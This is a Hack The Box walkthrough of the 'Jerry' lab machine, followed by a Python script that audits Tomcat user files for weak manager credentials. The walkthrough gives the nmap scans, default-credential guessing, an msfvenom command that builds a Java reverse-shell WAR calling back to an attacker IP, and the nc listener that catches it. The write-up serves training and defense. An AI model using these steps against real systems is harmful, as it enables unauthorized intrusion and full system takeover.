Jerry HTB
IP: 10.10.10.95
Initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.95 | cut -d"/" -f1 | tr '\n' ','
We can see the following port is open on the target server:
8080
Let's get some more details on this port:
sudo nmap -sCV -p8080 10.10.10.95 -oA nmap_results
Results:
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
We can see Apache Tomcat version 7.0.88 is running on the target.
Let's check it out.
HTTP Port 8080
Navigating to http://10.10.10.95:8080, we can confirm Apache Tomcat version 7.0.88 is indeed running.

Let's see if we can access the /manager directory.
We are greeted with a login prompt.
We try the following:
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
admin:tomcat
No luck, but we are brought to this error page:

We can see a set of credentials in the example shown on the error page:
tomcat:s3cret
Let's see if these work.
They do, and we are brought to the application manager.

Since we can upload .war files, we should be able to upload a reverse shell onto the target server and gain access.
First, let's generate a reverse shell to upload:
msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f war -o shell.war
Start a listener:
rlwrap -cAr nc -lvnp 9001
Now let's upload the file.

Now when we navigate to `http://10.10.10.95:8080/shell`, we should have a hit on our listener.

As you can see, we are nt authority\system.
We owned the system.
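
Added example (not part of the original write-up): the box fell because an account with a Manager role still used the sample password shown on Tomcat's own error page. The Python check below audits a tomcat-users.xml for accounts that can deploy WAR files and use one of the credential pairs mentioned above; the function name and the sample file are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Username/password pairs taken from this write-up (the guesses tried plus
# the sample pair shown on the error page).
KNOWN_WEAK = {
    ("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
    ("admin", "s3cr3t"), ("admin", "tomcat"), ("tomcat", "s3cret"),
}
# Manager roles that allow deploying a WAR (HTML GUI and text interface).
DEPLOY_ROLES = {"manager-gui", "manager-script"}


def audit_tomcat_users(xml_text):
    """Return findings for users that can deploy apps with weak credentials."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        # Newer Tomcat versions namespace the file; compare local names only.
        if elem.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = elem.get("username", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        deploy = sorted(roles & DEPLOY_ROLES)
        if not deploy:
            continue  # cannot deploy applications, out of scope for this check
        if (name, password) in KNOWN_WEAK:
            reason = "known default/sample credential"
        elif password == "" or password.lower() == name.lower():
            reason = "empty password or password equals username"
        else:
            continue
        findings.append({"user": name, "roles": deploy, "reason": reason})
    return findings


# Constructed sample file, not taken from the target.
SAMPLE = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deployer" password="Xq7!constructed-Long-Value" roles="manager-script"/>
  <user username="ops" password="ops" roles="manager-script,manager-status"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
</tomcat-users>"""

if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE):
        print(f"{f['user']}: {', '.join(f['roles'])} -> {f['reason']}")
```

Any finding means the Manager application is one guess away from code execution as the Tomcat service account, which on this box was nt authority\system.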